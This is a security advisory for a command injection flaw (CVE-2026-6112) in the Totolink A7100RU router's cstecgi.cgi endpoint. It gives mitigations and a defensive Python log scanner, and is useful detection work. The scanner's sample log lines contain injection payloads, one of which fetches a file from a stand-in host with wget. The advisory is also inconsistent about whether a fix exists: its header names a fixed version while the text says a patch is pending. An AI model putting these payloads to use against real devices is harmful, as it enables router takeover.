Platform: linux
Component: totolink-a7100ru
Fixed in: 7.4.1
A critical command injection vulnerability (CVE-2026-6112) has been discovered in the Totolink A7100RU router. The flaw allows a remote attacker to execute arbitrary operating system commands by manipulating the maxRtrAdvInterval argument passed to /cgi-bin/cstecgi.cgi, the router's web management CGI endpoint. It affects firmware version 7.4cu.2313_b20191024, and a public exploit is already available, making it a high-priority concern. Mitigations are available while a patch is being developed.
The impact of CVE-2026-6112 is severe. Successful exploitation gives an attacker complete control of the affected Totolink A7100RU router, including the ability to modify its configuration, intercept network traffic, install malware, and pivot to other devices on the network. Because the router is the network gateway, a compromise can expose the entire internal network to further attacks. The availability of a public exploit significantly increases the likelihood of widespread exploitation across home and small-business networks. The pattern is the usual one for command injection flaws in embedded devices: a parameter that should only ever be an integer (maxRtrAdvInterval is the IPv6 router-advertisement interval in seconds) reaches a system command without being validated.
CVE-2026-6112 is considered a high-probability threat because a public proof-of-concept exploit is available. It has not yet been added to the CISA KEV catalog, but its severity and the public exploit warrant close monitoring. The vulnerability was publicly disclosed on 2026-04-12. Active exploitation is highly likely given the ease of exploitation and the absence of a readily available patch.
Exploit Status
EPSS: 1.25% (79th percentile)
While a patch is pending, several steps reduce the risk. First, make sure the router's web management interface is not reachable from the internet: disable remote (WAN-side) management and, if the device must be administered remotely, reach it only over a VPN or from behind an upstream firewall. On the LAN, restrict access to /cgi-bin/cstecgi.cgi to trusted administrative hosts only; the endpoint belongs to the management interface, so ordinary clients have no need to reach it. The vulnerable code lives in the vendor firmware, so you cannot add input validation to it yourself; the equivalent control is an inline proxy, WAF or IDS rule that rejects requests to cstecgi.cgi whose maxRtrAdvInterval value is anything other than a plain integer. Monitor for requests to this endpoint, particularly values in that parameter containing shell metacharacters such as ;, |, backticks or $( ). If the firmware allows it, disable the remote management feature entirely until a patch is installed. After implementing these mitigations, verify them by attempting to reach /cgi-bin/cstecgi.cgi from an untrusted network position and confirming that the request is blocked rather than answered.
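The monitoring step above, as an added example that is not part of this advisory or of any Totolink code: a small Python script that parses access-log lines from a web server or proxy in front of the router, decodes the maxRtrAdvInterval value sent to /cgi-bin/cstecgi.cgi, and flags any value that is not a bare integer within the RFC 4861 range of 4 to 1800 seconds. The log lines, IP addresses and payloads are constructed for illustration; the allow-list check is the same rule an inline proxy would enforce to block the request instead of merely logging it.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines in Combined Log Format (not real traffic).
# 10.0.0.5 stands in for a trusted LAN admin host; 203.0.113.7 for an attacker.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2026:10:00:01 +0000] "POST /cgi-bin/cstecgi.cgi?maxRtrAdvInterval=600 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2026:10:00:02 +0000] "POST /cgi-bin/cstecgi.cgi?maxRtrAdvInterval=600%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 120 "-" "curl/8.0"
203.0.113.7 - - [12/Apr/2026:10:00:03 +0000] "GET /cgi-bin/cstecgi.cgi?maxRtrAdvInterval=%60id%60 HTTP/1.1" 200 12 "-" "curl/8.0"
10.0.0.5 - - [12/Apr/2026:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

VULNERABLE_PATH = "/cgi-bin/cstecgi.cgi"
PARAM = "maxRtrAdvInterval"

# RFC 4861 bounds MaxRtrAdvInterval to 4..1800 seconds; anything that is not a
# bare integer in that range has no business reaching a shell.
MIN_INTERVAL, MAX_INTERVAL = 4, 1800
INTEGER_RE = re.compile(r"^[0-9]{1,4}$")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def is_safe_interval(value: str) -> bool:
    """Allow-list check: a bare integer within the RFC 4861 range, nothing else."""
    if not INTEGER_RE.match(value):
        return False
    return MIN_INTERVAL <= int(value) <= MAX_INTERVAL


def query_params(query: str) -> dict:
    """Decode a query string by hand so that encoded separators (%3B, %26)
    inside a value are never mistaken for parameter delimiters."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def parse_log_line(line: str):
    """Split one Combined Log Format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        "params": query_params(parts.query),
        "status": int(m.group("status")),
    }


def find_injection_attempts(log_text: str) -> list:
    """Return one finding per request that sends a non-integer maxRtrAdvInterval
    to cstecgi.cgi; the decoded value is kept for the analyst."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None or rec["path"] != VULNERABLE_PATH:
            continue
        value = rec["params"].get(PARAM)
        if value is None or is_safe_interval(value):
            continue
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "value": value})
    return findings


if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {PARAM}={f['value']!r}")
```

The check is an allow-list (accept only what the parameter can legitimately be) rather than a blocklist of shell metacharacters, because an attacker can reach a shell through an encoding a blocklist missed. Most access logs do not record POST bodies, so if the device is driven by JSON or form bodies rather than query strings, the same rule has to run on an inline proxy or IDS that sees the body.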
Update the Totolink A7100RU device firmware to a patched version. Refer to the official Totolink website or contact technical support for the latest firmware version and update instructions.
CVE-2026-6112 is a critical vulnerability allowing remote command execution on Totolink A7100RU routers due to improper input validation in the /cgi-bin/cstecgi.cgi file.
You are affected if you are using a Totolink A7100RU router running version 7.4cu.2313_b20191024 and have not applied a patch or implemented mitigating controls.
A patch is pending. Until then, implement mitigations like isolating the router, restricting access to the vulnerable file, and monitoring logs.
Due to the public availability of a proof-of-concept exploit, active exploitation is highly likely.
Refer to the Totolink website for updates and advisories regarding CVE-2026-6112. Check their security notice section for the latest information.